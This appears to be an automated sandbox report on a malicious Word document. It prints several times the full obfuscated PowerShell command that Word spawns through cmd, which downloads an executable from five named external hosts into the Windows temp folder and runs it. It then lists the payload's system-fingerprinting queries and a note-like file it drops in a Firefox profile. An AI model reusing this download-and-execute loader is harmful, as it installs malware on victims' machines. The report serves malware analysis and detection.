Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Temp\229.exe 'C:\windows\temp\229.exe'			Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);	Jump to behavior

Language, Device and Operating System Detection:

Contains functionality locales information (e.g. system language)

Show sources

Source: C:\Windows\Temp\229.exe	Code function: EnumSystemLocalesW,	5_2_00425845
Source: C:\Windows\Temp\229.exe	Code function: GetLocaleInfoW,	5_2_0042F856
Source: C:\Windows\Temp\229.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_0042F97E
Source: C:\Windows\Temp\229.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	5_2_0042F1EA
Source: C:\Windows\Temp\229.exe	Code function: GetLocaleInfoW,	5_2_0042FA86
Source: C:\Windows\Temp\229.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_0042FB59
Source: C:\Windows\Temp\229.exe	Code function: EnumSystemLocalesW,	5_2_0042F4DB
Source: C:\Windows\Temp\229.exe	Code function: EnumSystemLocalesW,	5_2_0042F490
Source: C:\Windows\Temp\229.exe	Code function: EnumSystemLocalesW,	5_2_0042F576
Source: C:\Windows\Temp\229.exe	Code function: GetLocaleInfoW,	5_2_00425DD7
Source: C:\Windows\Temp\229.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	5_2_0042F601
Source: C:\Windows\Temp\229.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	5_1_0042F1EA
Source: C:\Windows\Temp\229.exe	Code function: EnumSystemLocalesW,	5_1_0042F4DB
Source: C:\Windows\Temp\229.exe	Code function: EnumSystemLocalesW,	5_1_0042F490
Source: C:\Windows\Temp\229.exe	Code function: EnumSystemLocalesW,	5_1_0042F576
Source: C:\Windows\Temp\229.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	5_1_0042F601
Source: C:\Windows\Temp\229.exe	Code function: EnumSystemLocalesW,	5_1_00425845
Source: C:\Windows\Temp\229.exe	Code function: GetLocaleInfoW,	5_1_0042F856
Source: C:\Windows\Temp\229.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_1_0042F97E
Source: C:\Windows\Temp\229.exe	Code function: GetLocaleInfoW,	5_1_0042FA86
Source: C:\Windows\Temp\229.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_1_0042FB59
Source: C:\Windows\Temp\229.exe	Code function: GetLocaleInfoW,	5_1_00425DD7

Contains functionality to query CPU information (cpuid)

Show sources

Source: C:\Windows\Temp\229.exe

Code function: 5_1_00415CB5 cpuid

5_1_00415CB5

Queries information about the installed CPU (vendor, model number etc)

Show sources

Source: C:\Windows\Temp\229.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Temp\229.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Temp\229.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Temp\229.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Temp\229.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Contains functionality to create pipes for IPC

Show sources

Source: C:\Windows\Temp\229.exe

Code function: 5_2_0040FA2E CreateNamedPipeW,ConnectNamedPipe,GetLastError,ReadFile,GetLastError,WriteFile,WriteFile,lstrlenW,WriteFile,WriteFile,CloseHandle,ExitThread,CloseHandle,

5_2_0040FA2E

Contains functionality to query local / system time

Show sources

Source: C:\Windows\Temp\229.exe

Code function: 5_2_00408E43 GetSystemTime,GetVolumeInformationW,wsprintfW,CreateFileW,GetLastError,

5_2_00408E43

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Overwrites Mozilla Firefox settings

Show sources

Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\PSVULHG-MANUAL.txt	Jump to behavior
